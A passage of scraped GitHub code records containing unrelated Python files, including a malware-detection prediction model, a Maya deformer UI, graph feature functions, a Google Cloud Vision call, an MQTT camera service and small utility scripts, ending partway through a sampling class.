tldextract\n\ndef func():\n url = input(\"Ввести URL: \")\n if url != \"\":\n extracted_info = tldextract.extract(url)\n print(\"Результат после экстракции:\", extracted_info)\n print(\"Доменное имя\", extracted_info.domain)\n else:\n print(\"Пустая строка\")\n url = \"https://github.com/W83w?tab=repositories\"\n return url\n\n","repo_name":"W83w/TestTasks","sub_path":"Neoflex/url.py","file_name":"url.py","file_ext":"py","file_size_in_byte":415,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"72533357866","text":"import pandas as pd\nimport numpy as np\nimport lightgbm as lgb\n#import xgboost as xgb\nfrom scipy.sparse import vstack, csr_matrix, save_npz, load_npz\nfrom sklearn.preprocessing import LabelEncoder, OneHotEncoder\nfrom sklearn.model_selection import StratifiedKFold\nfrom sklearn.neural_network import MLPRegressor\n#from sklearn.metrics import roc_auc_score\nimport gc\ngc.enable()\nfrom keras.models import Sequential\nfrom keras.layers import Dense\n\nfrom dtypes import dtypes\n\nprint('Download Train and Test Data.\\n')\ntrain = pd.read_csv('train.csv', dtype=dtypes, low_memory=True)\ntrain['MachineIdentifier'] = train.index.astype('uint32')\ntest = pd.read_csv('test.csv', dtype=dtypes, low_memory=True)\ntest['MachineIdentifier'] = test.index.astype('uint32')\n\ngc.collect()\n\nprint('Transform all features to category.\\n')\nfor usecol in train.columns.tolist()[1:-1]:\n\n train[usecol] = train[usecol].astype('str')\n test[usecol] = test[usecol].astype('str')\n \n #Fit LabelEncoder\n le = LabelEncoder().fit(\n np.unique(train[usecol].unique().tolist()+\n test[usecol].unique().tolist()))\n\n #At the end 0 will be used for dropped values\n train[usecol] = le.transform(train[usecol])+1\n test[usecol] = le.transform(test[usecol])+1\n\n agg_tr = (train\n .groupby([usecol])\n .aggregate({'MachineIdentifier':'count'})\n .reset_index()\n .rename({'MachineIdentifier':'Train'}, axis=1))\n agg_te = (test\n .groupby([usecol])\n .aggregate({'MachineIdentifier':'count'})\n .reset_index()\n .rename({'MachineIdentifier':'Test'}, axis=1))\n\n agg = pd.merge(agg_tr, agg_te, on=usecol, how='outer').replace(np.nan, 0)\n #Select values with more than 1000 observations\n agg = agg[(agg['Train'] > 1000)].reset_index(drop=True)\n agg['Total'] = agg['Train'] + agg['Test']\n #Drop unbalanced values\n agg = agg[(agg['Train'] / agg['Total'] > 0.2) & (agg['Train'] / agg['Total'] < 0.8)]\n agg[usecol+'Copy'] = agg[usecol]\n\n train[usecol] = (pd.merge(train[[usecol]], \n agg[[usecol, usecol+'Copy']], \n on=usecol, how='left')[usecol+'Copy']\n .replace(np.nan, 0).astype('int').astype('category'))\n\n test[usecol] = (pd.merge(test[[usecol]], \n agg[[usecol, usecol+'Copy']], \n on=usecol, how='left')[usecol+'Copy']\n .replace(np.nan, 0).astype('int').astype('category'))\n\n del le, agg_tr, agg_te, agg, usecol\n gc.collect()\n \ny_train = np.array(train['HasDetections'])\ntrain_ids = train.index\ntest_ids = test.index\n\ndel train['HasDetections'], train['MachineIdentifier'], test['MachineIdentifier']\ngc.collect()\n\nprint(\"If you don't want use Sparse Matrix choose Kernel Version 2 to get simple solution.\\n\")\n\nprint('--------------------------------------------------------------------------------------------------------')\nprint('Transform Data to Sparse Matrix.')\nprint('Sparse Matrix can be used to fit a lot of models, eg. XGBoost, LightGBM, Random Forest, K-Means and etc.')\nprint('To concatenate Sparse Matrices by column use hstack()')\nprint('Read more about Sparse Matrix https://docs.scipy.org/doc/scipy/reference/sparse.html')\nprint('Good Luck!')\nprint('--------------------------------------------------------------------------------------------------------')\n\n#Fit OneHotEncoder\nohe = OneHotEncoder(categories='auto', sparse=True, dtype='uint8').fit(train)\n\n#Transform data using small groups to reduce memory usage\nm = 100000\ntrain = vstack([ohe.transform(train[i*m:(i+1)*m]) for i in range(train.shape[0] // m + 1)])\ntest = vstack([ohe.transform(test[i*m:(i+1)*m]) for i in range(test.shape[0] // m + 1)])\nsave_npz('train.npz', train, compressed=True)\nsave_npz('test.npz', test, compressed=True)\n\ndel ohe, train, test\ngc.collect()\n\nskf = StratifiedKFold(n_splits=5, shuffle=True, random_state=42)\nskf.get_n_splits(train_ids, y_train)\n\nlgb_test_result = np.zeros(test_ids.shape[0])\n#lgb_train_result = np.zeros(train_ids.shape[0])\n#xgb_test_result = np.zeros(test_ids.shape[0])\n#xgb_train_result = np.zeros(train_ids.shape[0])\ncounter = 0\n\nprint('\\nLightGBM\\n')\nnn_model = Sequential()\nnn_model.add(Dense(64, input_dim=7739, activation='relu'))\nnn_model.add(Dense(32, activation='relu'))\nnn_model.add(Dense(1, activation='sigmoid'))\nnn_model.compile(loss='mse', optimizer='adam', metrics=['accuracy'])\n\nfor train_index, test_index in skf.split(train_ids, y_train):\n \n print('Fold {}\\n'.format(counter + 1))\n \n train = load_npz('train.npz')\n X_fit = vstack([train[train_index[i*m:(i+1)*m]] for i in range(train_index.shape[0] // m + 1)])\n X_val = vstack([train[test_index[i*m:(i+1)*m]] for i in range(test_index.shape[0] // m + 1)])\n X_fit, X_val = csr_matrix(X_fit, dtype='float32'), csr_matrix(X_val, dtype='float32')\n y_fit, y_val = y_train[train_index], y_train[test_index]\n \n del train\n gc.collect()\n\n # nn_model = MLPRegressor(hidden_layer_sizes=(100,20,))\n # nn_model.fit(X_fit, y_fit)\n\n # print('SHAPE = ', X_fit.shape)\n\n # nn_model = Sequential()\n # nn_model.add(Dense(64, input_dim=X_fit.shape[1], activation='relu'))\n # nn_model.add(Dense(32, activation='relu'))\n # nn_model.add(Dense(1, activation='sigmoid'))\n # nn_model.compile(loss='mse', optimizer='adam', metrics=['accuracy'])\n nn_model.fit(X_fit, y_fit, epochs=6, batch_size=32)\n\n # lgb_model = lgb.LGBMClassifier(max_depth=-1,\n # n_estimators=30000,\n # learning_rate=0.05,\n # num_leaves=2**12-1,\n # colsample_bytree=0.28,\n # objective='binary', \n # n_jobs=-1)\n \n #xgb_model = xgb.XGBClassifier(max_depth=6,\n # n_estimators=30000,\n # colsample_bytree=0.2,\n # learning_rate=0.1,\n # objective='binary:logistic', \n # n_jobs=-1)\n \n \n # lgb_model.fit(X_fit, y_fit, eval_metric='auc', \n # eval_set=[(X_val, y_val)], \n # verbose=100, early_stopping_rounds=100)\n \n #xgb_model.fit(X_fit, y_fit, eval_metric='auc', \n # eval_set=[(X_val, y_val)], \n # verbose=1000, early_stopping_rounds=300)\n\n #lgb_train_result[test_index] += lgb_model.predict_proba(X_val)[:,1]\n #xgb_train_result[test_index] += xgb_model.predict_proba(X_val)[:,1]\n \n del X_fit, X_val, y_fit, y_val, train_index, test_index\n gc.collect()\n \n test = load_npz('test.npz')\n test = csr_matrix(test, dtype='float32')\n # lgb_test_result += lgb_model.predict_proba(test)[:,1]\n res = nn_model.predict(test, batch_size=16)[:,0]\n # print('RES SHAPE = ', res.shape)\n lgb_test_result += res\n # exit()\n #xgb_test_result += xgb_model.predict_proba(test)[:,1]\n counter += 1\n \n del test\n gc.collect()\n \n #Stop fitting to prevent time limit error\n #if counter == 3 : break\n\n#print('\\nLigthGBM VAL AUC Score: {}'.format(roc_auc_score(y_train, lgb_train_result)))\n#print('\\nXGBoost VAL AUC Score: {}'.format(roc_auc_score(y_train, xgb_train_result)))\n\nsubmission = pd.read_csv('sample_submission.csv')\nsubmission['HasDetections'] = lgb_test_result / counter\nsubmission.to_csv('lgb_submission_2.csv', index=False)\n#submission['HasDetections'] = xgb_test_result / counter\n#submission.to_csv('xgb_submission.csv', index=False)\n#submission['HasDetections'] = 0.5 * lgb_test_result / counter + 0.5 * xgb_test_result / counter \n##submission.to_csv('lgb_xgb_submission.csv', index=False)\n\nprint('\\nDone.')","repo_name":"CyberDreamer/microsoft_malware","sub_path":"lightgbm-baseline-model-using-sparse-matrix.py","file_name":"lightgbm-baseline-model-using-sparse-matrix.py","file_ext":"py","file_size_in_byte":7982,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"16793025378","text":"# -*- coding: utf-8 -*-\r\n\r\n# User interface for Poisson MLS Deformer plugin\r\n# The last object in the selected ones will be the target while the others will serve as control points\r\n\r\n# @author Shizuo KAJI\r\n# @date 2016/11/14\r\n\r\n# for debug\r\n#import debugmaya\r\n#debugmaya.startDebug()\r\n\r\n# Import Maya Modules\r\nimport maya.cmds as cmds\r\nimport pymel.core as pm\r\n\r\ndeformerTypes = [\"PoissonMLS\"]\r\n\r\nfor type in deformerTypes:\r\n try:\r\n cmds.loadPlugin(type)\r\n except:\r\n print(\"Plugin %s already loaded\" %(type))\r\n\r\n## prepare interface\r\nclass UI_PoissonMLS:\r\n uiID = \"PoissonMLS\"\r\n title = \"PoissonMLS\"\r\n deformers = []\r\n probes = {}\r\n\r\n ## Constructor\r\n def __init__(self):\r\n if pm.window(self.uiID, exists=True):\r\n pm.deleteUI(self.uiID)\r\n win = pm.window(self.uiID, title=self.title, menuBar=True)\r\n with win:\r\n pm.menu( label='Create', tearOff=True )\r\n for type in deformerTypes:\r\n pm.menuItem( label=type, c=pm.Callback( self.initPlugin, type) )\r\n self._parentLayout = pm.columnLayout( adj=True )\r\n with self._parentLayout:\r\n self.createUISet()\r\n\r\n def createUISet(self):\r\n self._childLayout = pm.columnLayout( adj=True )\r\n with self._childLayout:\r\n self.deformers = [pm.ls(type=deformerTypes[i]) for i in range(len(deformerTypes))]\r\n for i in range(len(deformerTypes)):\r\n for node in self.deformers[i]:\r\n self.probes[node] = pm.listConnections(node.cp)\r\n # specific\r\n for node in self.deformers[0]:\r\n frameLayout = pm.frameLayout( label=node.name(), collapsable = True)\r\n with frameLayout:\r\n self.createCommonAttr(node, deformerTypes[0])\r\n indices = cmds.getAttr(node+\".cp\", multiIndices=True)\r\n if indices:\r\n for j in indices:\r\n with pm.rowLayout(numberOfColumns=1) :\r\n pm.attrFieldSliderGrp(label=node.ctlw[j].getAlias(), min=0, max=10.0, attribute=node.ctlw[j])\r\n\r\n # create deformer node and connection\r\n def initPlugin(self, deformerType):\r\n # get transform nodes for the selected objects\r\n transforms = pm.selected(tr=1)\r\n if not transforms:\r\n return\r\n pm.select( transforms[-1]) # the deformer is attached to the last selected object\r\n node = pm.ls(cmds.deformer(type=deformerType)[0])[0]\r\n cmds.makePaintable(deformerType, 'weights', attrType='multiFloat', shapeMode='deformer')\r\n if len(transforms)>1:\r\n self.addProbe(node,deformerType,transforms[:-1])\r\n self.updateUI()\r\n\r\n # add selected transform as a new probe\r\n def addProbe(self,node,deformerType,newProbes):\r\n indexes = cmds.getAttr(node+\".cp\", multiIndices=True)\r\n if not indexes:\r\n n=0\r\n else:\r\n n=indexes[-1]+1\r\n # connect pm first to avoid unnecessary arap computations\r\n for j in range(len(newProbes)):\r\n cmds.connectAttr(newProbes[j]+\".center\", node+\".cp[%s]\" %(j+n))\r\n cmds.connectAttr(newProbes[j]+\".scaleX\", node+\".ctlw[%s]\" %(j+n))\r\n node.icp[j+n].set(node.cp[j+n].get())\r\n\r\n # add selected transform as a new probe\r\n def addSelectedProbe(self,node,deformerType):\r\n newProbes = pm.selected(tr=1)\r\n self.addProbe(node,deformerType,newProbes)\r\n self.updateUI()\r\n\r\n # delete deformer node\r\n def deleteNode(self,node):\r\n cmds.delete(node.name())\r\n self.updateUI()\r\n\r\n # redraw UI\r\n def updateUI(self):\r\n pm.deleteUI( self._childLayout )\r\n pm.setParent(self._parentLayout)\r\n self.createUISet()\r\n\r\n def createCommonAttr(self,node,deformerType):\r\n with pm.rowLayout(numberOfColumns=3) :\r\n pm.button( l=\"Add selection to ctrl points\", c=pm.Callback( self.addSelectedProbe, node, deformerType) )\r\n pm.button( l=\"Delete deformer\", c=pm.Callback( self.deleteNode, node))\r\n pm.attrControlGrp( label=\"Poisson\", attribute= node.poisson)\r\n with pm.rowLayout(numberOfColumns=4) :\r\n pm.attrControlGrp( label=\"MLS mode\", attribute= node.mlsm)\r\n pm.attrControlGrp( label=\"area weight\", attribute= node.aw)\r\n pm.attrControlGrp( label=\"neighbour weighting\", attribute= node.nghbrw)\r\n pm.attrFieldSliderGrp( label=\"iteration\", min=1, max=20, attribute=node.it)\r\n with pm.rowLayout(numberOfColumns=4) :\r\n pm.attrControlGrp( label=\"Weight mode\", attribute= node.wtm)\r\n pm.attrFieldSliderGrp(label=\"effect radius\", min=0.001, max=20.0, attribute=node.er)\r\n pm.attrControlGrp( label=\"normalise weight\", attribute= node.nw)\r\n pm.attrControlGrp( label=\"normExponent\", attribute=node.ne)\r\n with pm.rowLayout(numberOfColumns=4) :\r\n pm.attrControlGrp( label=\"tet mode\", attribute= node.tm)\r\n pm.attrControlGrp( label=\"constraint mode\", attribute= node.ctm)\r\n pm.attrFieldSliderGrp( label=\"constraint weight\", min=0.001, max=1000, attribute=node.cw)\r\n pm.attrFieldSliderGrp(label=\"constraint radius\", min=0.001, max=10.0, attribute=node.cr)\r\n\r\n","repo_name":"shizuo-kaji/PoissonMLS","sub_path":"ui_PoissonMLS.py","file_name":"ui_PoissonMLS.py","file_ext":"py","file_size_in_byte":5371,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"37"} +{"seq_id":"1396608628","text":"\"\"\"Role-similarity Based Comparison class.\"\"\"\nfrom functools import lru_cache\n\nimport networkx as nx\nimport numpy as np\nfrom sklearn.preprocessing import normalize\n\nfrom hcga.feature_class import FeatureClass, InterpretabilityScore\nfrom hcga.features.utils import ensure_connected, remove_selfloops\n\nfeatureclass_name = \"RolesimilarityBasedComparison\"\n\n\n@lru_cache(maxsize=None)\ndef rbc(graph):\n \"\"\"Rbc computation.\n\n Features based on the role of a node in a directed network.\n\n Create the role-similarity based comparison (rbc) matrix for nodes in the network,\n then convert this to a graph and extract some features\n ref: https://arxiv.org/abs/1103.5582\n For some features we remove selfloops, since the diagonal of the rbc matrix\n consists of ones, and therefore all nodes will have a selfloop with weight one\n\n References\n ----------\n .. [1] Cooper, Kathryn, and Mauricio Barahona.\n \"Role-based similarity in directed networks.\"\n arXiv preprint arXiv:1012.2726 (2010).\n\n\n \"\"\"\n a = np.where(nx.adj_matrix(graph).toarray() > 0, 1, 0)\n g = nx.DiGraph(a)\n\n if nx.is_directed_acyclic_graph(g):\n k = nx.dag_longest_path_length(g)\n beta = 0.95\n\n else:\n lamb = max(np.linalg.eig(a)[0])\n if lamb != 0:\n beta = 0.95 / lamb\n else:\n beta = 0.95\n k = 10\n\n n = g.number_of_nodes()\n ones = np.ones(n)\n ba = beta * a\n ba_t = np.transpose(ba)\n\n x = np.zeros([n, k * 2])\n for i in range(1, k + 1):\n x[:, i - 1] = np.dot(np.linalg.matrix_power(ba, i), ones)\n x[:, i + k - 1] = np.dot(np.linalg.matrix_power(ba_t, i), ones)\n x_norm = normalize(x, axis=1)\n y = np.matmul(x_norm, np.transpose(x_norm))\n\n return nx.Graph(y)\n\n\ndef number_of_edges(graph):\n \"\"\"\"\"\"\n return rbc(graph).number_of_edges()\n\n\ndef number_of_edges_no_selfloops(graph):\n \"\"\"\"\"\"\n return remove_selfloops(rbc(graph)).number_of_edges()\n\n\ndef connectance(graph):\n \"\"\"\"\"\"\n return nx.density(rbc(graph))\n\n\ndef diameter(graph):\n \"\"\"\"\"\"\n return nx.diameter(rbc(ensure_connected(graph)))\n\n\ndef radius(graph):\n \"\"\"\"\"\"\n return nx.radius(rbc(ensure_connected(graph)))\n\n\ndef degree_assortativity_coeff(graph):\n \"\"\"\"\"\"\n return nx.degree_assortativity_coefficient(rbc(graph))\n\n\ndef graph_clique_number(graph):\n \"\"\"\"\"\"\n return nx.graph_clique_number(rbc(graph))\n\n\ndef num_max_cliques(graph):\n \"\"\"\"\"\"\n return nx.graph_number_of_cliques(rbc(graph))\n\n\ndef transitivity(graph):\n \"\"\"\"\"\"\n return nx.transitivity(rbc(graph))\n\n\ndef is_connected(graph):\n \"\"\"\"\"\"\n return nx.is_connected(rbc(graph)) * 1\n\n\ndef num_connected_components(graph):\n \"\"\"\"\"\"\n return nx.number_connected_components(rbc(graph))\n\n\ndef largest_connected_component(graph):\n \"\"\"\"\"\"\n return rbc(ensure_connected(graph)).number_of_nodes()\n\n\ndef global_efficiency(graph):\n \"\"\"\"\"\"\n return nx.global_efficiency(rbc(graph))\n\n\ndef node_connectivity(graph):\n \"\"\"\"\"\"\n return nx.node_connectivity(rbc(graph))\n\n\ndef edge_connectivity(graph):\n \"\"\"\"\"\"\n return nx.edge_connectivity(rbc(graph))\n\n\nclass RolesimilarityBasedComparison(FeatureClass):\n \"\"\"Role-similarity Based Comparison class.\"\"\"\n\n modes = [\"fast\", \"medium\", \"slow\"]\n shortname = \"RBC\"\n name = \"rbc\"\n encoding = \"networkx\"\n\n def compute_features(self):\n # Basic stats\n self.add_feature(\n \"number_of_edges\",\n number_of_edges,\n \"Number of edges in Jaccard similarity graph\",\n InterpretabilityScore(5),\n )\n\n self.add_feature(\n \"number_of_edges_no_selfloops\",\n number_of_edges_no_selfloops,\n \"Number of edges, not including selfloops, in Jaccard similarity graph\",\n InterpretabilityScore(5),\n )\n\n self.add_feature(\n \"connectance\",\n connectance,\n \"Connectance of Jaccard similarity graph\",\n InterpretabilityScore(5),\n )\n\n self.add_feature(\n \"diameter\",\n diameter,\n \"Diameter of Jaccard similarity graph\",\n InterpretabilityScore(5),\n )\n\n self.add_feature(\n \"radius\",\n radius,\n \"Radius of Jaccard similarity graph\",\n InterpretabilityScore(5),\n )\n\n # Assortativity\n self.add_feature(\n \"degree_assortativity_coeff\",\n degree_assortativity_coeff,\n \"Similarity of connections in Jaccard similarity graph with respect to the node degree\",\n InterpretabilityScore(4),\n )\n\n # Cliques\n self.add_feature(\n \"graph_clique_number\",\n graph_clique_number,\n \"The size of the largest clique in the Jaccard similarity graph\",\n InterpretabilityScore(3),\n )\n\n self.add_feature(\n \"num_max_cliques\",\n num_max_cliques,\n \"The number of maximal cliques in the Jaccard similarity graph\",\n InterpretabilityScore(3),\n )\n\n # Clustering\n self.add_feature(\n \"transitivity\",\n transitivity,\n \"Transitivity of the graph\",\n InterpretabilityScore(4),\n )\n\n # Components\n self.add_feature(\n \"is_connected\",\n is_connected,\n \"Whether the Jaccard similarity graph is connected or not\",\n InterpretabilityScore(5),\n )\n\n self.add_feature(\n \"num_connected_components\",\n num_connected_components,\n \"The number of connected components\",\n InterpretabilityScore(5),\n )\n\n self.add_feature(\n \"largest_connected_component\",\n largest_connected_component,\n \"The size of the largest connected component\",\n InterpretabilityScore(4),\n )\n\n # Efficiency\n self.add_feature(\n \"global_efficiency\",\n global_efficiency,\n \"The global efficiency\",\n InterpretabilityScore(4),\n )\n\n # Node connectivity\n self.add_feature(\n \"node_connectivity\",\n node_connectivity,\n \"Node connectivity\",\n InterpretabilityScore(4),\n )\n\n self.add_feature(\n \"edge_connectivity\",\n edge_connectivity,\n \"Edge connectivity\",\n InterpretabilityScore(4),\n )\n","repo_name":"barahona-research-group/hcga","sub_path":"hcga/features/rbc.py","file_name":"rbc.py","file_ext":"py","file_size_in_byte":6491,"program_lang":"python","lang":"en","doc_type":"code","stars":36,"dataset":"github-code","pt":"37"} +{"seq_id":"40480312486","text":"# Возвести число x в степерь y. 2^10 = 1024\n\ndef power(x, y):\n if y == 0:\n return 1\n return x * power(x, y-1)\n\n\nif __name__ == '__main__':\n print(power(2, 10))","repo_name":"milssky/python_16plus_recursion","sub_path":"6.py","file_name":"6.py","file_ext":"py","file_size_in_byte":196,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"41899981508","text":"\"\"\"\n Raspberry Pi Jam GSOC Photo Booth\n\n\"\"\"\nimport base64, os, sys, time\nfrom googleapiclient import discovery\nfrom oauth2client.client import GoogleCredentials\n\ndef GoogleCloudVision(dLandmarks, fp):\n sys.stdout.write(\"--------------------------------------------------------------\\n\")\n sys.stdout.write(\"Start of Google Cloud Vision Process: %s\\n\\n\" % (time.strftime(\"%H:%M:%S\", time.localtime())))\n\n os.environ[\"GOOGLE_APPLICATION_CREDENTIALS\"] = \"credentials/googlevisionauthentication.json\"\n credentials = GoogleCredentials.get_application_default()\n service = discovery.build('vision', 'v1', credentials=credentials)\n image_content = base64.b64encode(fp.read())\n service_request = service.images().annotate(body={'requests':[{'image':{'content':image_content.decode('UTF-8')},'features':[{'type':'FACE_DETECTION','maxResults':10}]}]})\n\n dLandmarks = {}\n \n try:\n response = service_request.execute()\n except Exception as e:\n print(\"** COULDN'T CONNECT TO THE GOOGLE CLOUD, TRY AGAIN LATER! ** %s\" % str(e))\n return dLandmarks\n\n try:\n dResponse = response['responses'][0]['faceAnnotations'][0]\n except KeyError as e:\n print(\"** TRY AGAIN - COULDN'T GET A GOOD LOOK AT YOUR EYES!!! ** %s\" % str(e))\n else:\n for i in range(0, len(dResponse['landmarks'])):\n dLandmarks[dResponse['landmarks'][i]['type']] = (dResponse['landmarks'][i]['position']['x'], dResponse['landmarks'][i]['position']['y'])\n del dResponse\n\n del credentials\n del service\n del service_request\n \n sys.stdout.write(\"End of Google CloudVision Process: %s\\n\\n\" % (time.strftime(\"%H:%M:%S\", time.localtime())))\n sys.stdout.write(\"--------------------------------------------------------------\\n\")\n\n return dLandmarks\n \n \n","repo_name":"bhontz/photobooth","sub_path":"GoogleCloudVision.py","file_name":"GoogleCloudVision.py","file_ext":"py","file_size_in_byte":1817,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"30008379272","text":"\"\"\"\nhelpers.house_keeper: module that contains methods that are used here and there for maintenence.\n\n\nhelpers.house_keeper.dist_sq(i , j , df): computes square of the difference between i'th and j'th column vector of the matrix\n params:\n i, j: indices of the columns of a matrix\n df: pandas dataframe object\n return: a vector\n\n\nhelpers.house_keeper.clean(mat): duplicates the matrix just with all values real\n params: \n mat: a matrix\n return: \n mat: mat\n\n\nhelpers.house_keeper.wrapx(mat): enumerates first row of the matrix from the first column to the las\n params: \n mat: a square matrix\n return: \n mat: a matrix\n\n\nhelpers.house_keeper.wrapy(mat): enumerates first columns of the mmtrix from the first first to the last\n params: \n mat: a square matrix\n return: \n mat: a matrix\n\n\nhelpers.house_keeper.wrap(mat): enumerates top rows and columns of the matrix from first to the last\n params: \n mat: a square matrix\n return: \n mat: a matrix\n\"\"\"\n\n\nimport numpy as np\nimport cmath\n\n\ndef dist_sq(i, j, df): # pandas df\n result_vector = df[list(df.columns)[i]] - df[list(df.columns)[j]]\n result_vector = result_vector * result_vector\n result = result_vector.sum()\n return result\n\n\ndef clean(mat):\n return mat.real\n\n\ndef wrapx(mat):\n wrapx = [0]\n n = len(mat[0])\n wrapx[0] = np.arange(0, n, 1)\n mat = np.vstack((wrapx, mat))\n return mat\n\n\ndef wrapy(mat):\n mat = np.transpose(mat)\n wrapy = [0]\n n = len(mat)\n wrapy[0] = np.arange(0, n, 1)\n mat = np.vstack((wrapy, mat))\n mat = np.transpose(mat)\n return mat\n\n\ndef wrap(mat):\n mat = wrapy(mat)\n wrap = [0]\n wrap[0] = [i for i in range(len(mat[0]))]\n mat = np.vstack((wrap, mat))\n return mat\n","repo_name":"xfurna/coalapy","sub_path":"coalapy/helpers/house_keeper.py","file_name":"house_keeper.py","file_ext":"py","file_size_in_byte":1798,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"14597821197","text":"from django.core.management.base import BaseCommand, CommandError\nfrom django.contrib.auth.models import User\n\nclass Command(BaseCommand):\n help = 'Adds the given product to the given user\\'s shopping cart'\n\n def add_arguments(self, parser):\n parser.add_argument('user', type=int)\n parser.add_argument('product', type=int)\n parser.add_argument('quantity', type=int)\n\n def handle(self, *args, **options):\n quantity = options['quantity']\n user_id = options['user']\n product_id = options['product']\n\n try:\n user = User.objects.get(pk=user_id)\n except:\n raise CommandError('User {0} does not exist!'.format(user_id))\n\n try:\n products = user.shopping_cart.add_product(product_id, quantity=quantity)\n except:\n raise CommandError('Product {0} cannot be added to the cart!'.format(product_id))\n\n success_message = 'Added {0} products for a total of {1} in the cart.'.format(quantity, len(products))\n self.stdout.write(self.style.SUCCESS(success_message))\n","repo_name":"alekhinen/everlane","sub_path":"shopping/management/commands/add_to_cart.py","file_name":"add_to_cart.py","file_ext":"py","file_size_in_byte":1084,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"71428816747","text":"#!/usr/bin/python3\n\nfrom time import sleep\nimport threading\nimport json\nimport paho.mqtt.client as mqtt\n\nimport signal\nimport time\n\nimport io\nfrom PIL import Image\nimport base64\nfrom io import StringIO\nimport cv2\n\n\nclass CoreService(object):\n _kill_now = False\n\n _comm_client = None\n _comm_delay = 0\n _thread_comms = None\n _thread_lock = None\n\n _camera = None\n\n _system_channel = '/system'\n _data_channel = '/camera/macos'\n\n\n def __init__(self):\n signal.signal(signal.SIGINT, self.exit_gracefully)\n signal.signal(signal.SIGTERM, self.exit_gracefully)\n\n def start(self):\n self._comm_client = mqtt.Client(\n client_id=\"service_camera_macos\",\n clean_session=True\n )\n\n self._comm_client.on_message = self._on_message\n self._comm_client.on_connect = self._on_connect\n self._comm_client.on_publish = self._on_publish\n self._comm_client.on_subscribe = self._on_subscribe\n\n self._thread_lock = threading.RLock()\n\n self._thread_comms = threading.Thread(target=self._start_thread_comms)\n self._thread_comms.setDaemon(True)\n self._thread_comms.start()\n\n try:\n pass\n\n except Exception as e:\n self._camera = None\n print(e)\n\n # define a video capture object\n self._camera = cv2.VideoCapture(0)\n\n while True:\n if self._camera:\n print(\"[CAMERA-MACOS] Starting filestream.\")\n\n stream = io.BytesIO()\n image = None\n img_str = None\n buf = None\n\n print(\"[CAMERA-MACOS] Taking a photo..\")\n\n try:\n time.sleep(2)\n\n # Capture raw camera image and create a PIL image object\n ret, frame = self._camera.read()\n is_success, buffer = cv2.imencode(\".jpg\", frame)\n stream = io.BytesIO(buffer)\n\n img_str = base64.b64encode(buffer)\n\n except Exception as e:\n print(\"[TURING-CAMERA-MACOS] Had an issue capturing a photo: %s\" % e)\n\n try:\n self.output(img_str, self._data_channel)\n\n except Exception as e:\n print(\"[TURING-CAMERA-MACOS] Couldn't publish to comms\")\n\n else:\n print(\"[CAMERA-MACOS] Skipping taking a photo. Not a supported OS.\")\n\n time.sleep(10)\n\n if self._kill_now:\n # After the loop release the cap object\n self._camera.release()\n # Destroy all the windows\n cv2.destroyAllWindows()\n\n\n # self._camera.close()\n break\n\n def _on_connect(self, client, userdata, flags, rc):\n self.output('{\"sender\": \"service_camera_macos\", \"message\": \"Connected to GrandCentral.\"}')\n\n def _on_message(self, client, userdata, msg):\n msg_struct = None\n\n try:\n msg_struct = json.loads(msg.payload)\n\n except:\n pass\n\n def _on_publish(self, mosq, obj, mid):\n pass\n\n def _on_subscribe(self, mosq, obj, mid, granted_qos):\n self.output('{\"sender\": \"service_camera_macos\", \"message\": \"Successfully subscribed to GrandCentral /system channel.\"}')\n\n def _on_log(self, mosq, obj, level, string):\n pass\n\n def _connect_to_comms(self):\n print('Connecting to comms system..')\n\n try:\n self._comm_client.connect(\n 'localhost',\n 1883,\n 60\n )\n\n except Exception as e:\n print('Could not connect to local GranCentral. Retry in one second.')\n\n time.sleep(1)\n self._connect_to_comms()\n\n def _start_thread_comms(self):\n print('Comms thread started.')\n\n self._thread_lock.acquire()\n\n try:\n self._connect_to_comms()\n\n finally:\n self._thread_lock.release()\n\n print('Connected to comms server.')\n\n while True:\n self._thread_lock.acquire()\n\n try:\n if self._comm_delay > 2000:\n self._comm_client.loop()\n self._comm_delay = 0\n\n else:\n self._comm_delay += 1\n\n finally:\n self._thread_lock.release()\n\n def output(self, msg, channel=_system_channel):\n if self._comm_client:\n self._comm_client.publish(channel, msg)\n\n def stop(self):\n pass\n\n def exit_gracefully(self,signum, frame):\n self._kill_now = True\n","repo_name":"enborra/turing-camera-macos","sub_path":"app/core/core_service.py","file_name":"core_service.py","file_ext":"py","file_size_in_byte":4649,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"30980370519","text":"def solution(numbers):\n answer = []\n for number in numbers:\n bin_number = get_binary(number)\n i = number+1\n while True:\n if compare_binary(bin_number, get_binary(i)) <= 2:\n answer.append(i)\n break\n i += 1\n return answer\n \ndef get_binary(number):\n bin_number = ''\n while number > 0:\n bin_number = bin_number + str(number%2)\n number = number//2\n return bin_number[::-1]\n\ndef compare_binary(bin1, bin2):\n cnt = 0\n max_len = max(len(bin1), len(bin2))\n bin1 = bin1.rjust(max_len, '0')\n bin2 = bin2.rjust(max_len, '0')\n for i in range(max_len):\n if bin1[i] != bin2[i]:\n cnt += 1\n return cnt\n\nnumbers = [2,7]\nprint(solution(numbers))","repo_name":"sang981113/CodingTest","sub_path":"less_than_2_difference_in_bit.py","file_name":"less_than_2_difference_in_bit.py","file_ext":"py","file_size_in_byte":774,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"72379747307","text":"import copy\nimport functools\nimport itertools\nimport operator\nimport random\n\nimport matplotlib.pyplot as plt\nimport networkx as nx\nimport numpy as np\nimport scipy.stats\n\n\nclass ResponseGraphUCB(object):\n \"\"\"ResponseGraphUCB sampler class.\"\"\"\n\n def __init__(self,\n game,\n exploration_strategy='uniform-exhaustive',\n confidence_method='ucb-standard',\n delta=0.01,\n ucb_eps=0,\n per_payoff_confidence=True,\n time_dependent_delta=False):\n \"\"\"Initializes ResponseGraphUCB instance.\n\n Assumes that all payoffs fall in the interval [0,1].\n\n Args:\n game: an instance of the BernoulliGameSampler class.\n exploration_strategy: string specifying the exploration strategy.\n confidence_method: string specifying the confidence method.\n delta: float specifying the 